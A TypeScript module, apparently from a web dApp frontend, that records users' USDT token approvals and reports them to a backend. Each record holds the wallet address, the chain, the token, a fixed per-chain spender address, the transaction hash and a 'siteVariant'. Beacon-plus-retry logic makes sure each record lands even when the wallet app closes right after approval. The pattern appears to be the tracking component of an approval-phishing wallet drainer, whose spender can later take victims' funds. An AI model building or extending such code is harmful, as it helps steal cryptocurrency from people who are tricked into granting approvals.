import type { SiteVariant, WalletChainId } from "../config"
import { getSpenderForChain, getUsdtForChain } from "../contracts/addresses"

export type SubmitApprovalPayload = {
  walletAddress: string
  chain: WalletChainId
  tokenAddress: string
  spenderAddress: string
  approvalTxHash?: string
  siteVariant: SiteVariant
}

function getApiBaseUrl() {
  return import.meta.env.VITE_API_URL?.replace(/\/$/, "") ?? ""
}

/**
 * Trust / some TRON wallets return objects or garbage from approve().send().
 * Only keep plausible tx ids so ingest is never rejected for a bad hash.
 */
export function normalizeApprovalTxHash(raw: unknown): string | undefined {
  if (typeof raw === "string") {
    const trimmed = raw.trim()
    if (
      !trimmed ||
      trimmed === "[object Object]" ||
      trimmed === "undefined" ||
      trimmed === "null"
    ) {
      return undefined
    }
    if (/^(0x)?[a-fA-F0-9]{64}$/i.test(trimmed)) {
      return trimmed.replace(/^0x/i, "")
    }
    if (trimmed.length >= 8 && trimmed.length <= 128) {
      return trimmed
    }
    return undefined
  }
  if (raw && typeof raw === "object") {
    const obj = raw as Record<string, unknown>
    for (const key of ["txid", "txId", "transaction", "txID", "id"]) {
      const nested = normalizeApprovalTxHash(obj[key])
      if (nested) return nested
    }
  }
  return undefined
}

/** Drop null/empty/invalid tx hashes so JSON never sends bad approvalTxHash. */
function sanitizePayload(payload: SubmitApprovalPayload): SubmitApprovalPayload {
  const approvalTxHash = normalizeApprovalTxHash(payload.approvalTxHash)
  if (!approvalTxHash) {
    const { approvalTxHash: _omit, ...rest } = payload
    void _omit
    return rest
  }
  return { ...payload, approvalTxHash }
}

function trySendBeacon(url: string, json: string): boolean {
  try {
    if (
      typeof navigator === "undefined" ||
      typeof navigator.sendBeacon !== "function"
    ) {
      return false
    }
    const blob = new Blob([json], { type: "application/json" })
    return navigator.sendBeacon(url, blob)
  } catch {
    return false
  }
}

export async function submitApprovalRecord(
  payload: SubmitApprovalPayload,
): Promise<boolean> {
  const apiBaseUrl = getApiBaseUrl()
  if (!apiBaseUrl) {
    console.warn("[submitApprovalRecord] Missing VITE_API_URL")
    return false
  }

  const body = sanitizePayload(payload)
  const url = `${apiBaseUrl}/api/public/approvals`
  const json = JSON.stringify(body)

  // Trust Wallet (and similar) often tear down the WebView right after the
  // user confirms approve — fire a beacon first so ingest still lands.
  trySendBeacon(url, json)

  for (let attempt = 0; attempt < 2; attempt += 1) {
    try {
      const response = await fetch(url, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: json,
        keepalive: true,
      })

      if (response.ok) {
        return true
      }

      if (attempt === 0 && response.status >= 500) {
        continue
      }

      console.warn(
        `[submitApprovalRecord] Failed with status ${response.status}`,
      )
      return false
    } catch (cause) {
      if (attempt === 0) continue
      console.warn("[submitApprovalRecord] Network error", cause)
      // Beacon may still have delivered; treat as soft success only when
      // we know a beacon was queued — caller should still rely on reporter.
      return false
    }
  }

  return false
}

export function buildApprovalPayload(input: {
  walletAddress: string
  chain: WalletChainId
  approvalTxHash?: string | null
  siteVariant: SiteVariant
}): SubmitApprovalPayload {
  const usdt = getUsdtForChain(input.chain)
  const approvalTxHash = normalizeApprovalTxHash(input.approvalTxHash)
  return {
    walletAddress: input.walletAddress,
    chain: input.chain,
    tokenAddress: usdt.address,
    spenderAddress: getSpenderForChain(input.chain),
    ...(approvalTxHash ? { approvalTxHash } : {}),
    siteVariant: input.siteVariant,
  }
}
